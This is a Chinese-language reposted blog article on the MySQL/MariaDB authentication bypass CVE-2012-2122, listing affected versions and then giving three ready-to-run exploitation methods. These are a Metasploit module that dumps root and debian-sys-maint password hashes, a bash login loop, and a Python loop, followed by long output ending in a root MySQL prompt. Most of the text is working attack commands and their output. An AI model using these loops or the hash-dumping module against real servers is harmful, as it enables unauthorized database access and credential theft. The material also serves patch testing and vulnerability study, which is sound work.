Mysql身份认证漏洞及利用(CVE-2012-2122)
生活随笔
收集整理的這篇文章主要介紹了
Mysql身份认证漏洞及利用(CVE-2012-2122)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
當連接MariaDB/MySQL時,輸入的密碼會與期望的正確密碼比較,由于不正確的處理,會導致即便是memcmp()返回一個非零值,也會使MySQL認為兩個密碼是相同的。 也就是說只要知道用戶名,不斷嘗試就能夠直接登入SQL數據庫。按照公告說法大約256次就能夠蒙對一次。而且漏洞利用工具已經出現。 受影響的產品: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are
vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
測試方法1:
網上已經出了metasploit版本的相應利用工具,
$ msfconsole msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1 msf auxiliary(mysql_authbypass_hashdump) > run [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test [*] 127.0.0.1:3306 Authentication bypass is 10% complete [*] 127.0.0.1:3306 Authentication bypass is 20% complete [*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes... [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89 [*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed測試方法2:
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done mysql>測試方法3:
#!/usr/bin/python import subprocesswhile 1:subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait()如下:
relik@stronghold:~# python mysql_bypass.py ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES) Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -AWelcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 24598 Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.mysql>總結
以上是生活随笔為你收集整理的Mysql身份认证漏洞及利用(CVE-2012-2122)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: msf各种弱口令爆破
- 下一篇: mongo-express 远程代码执行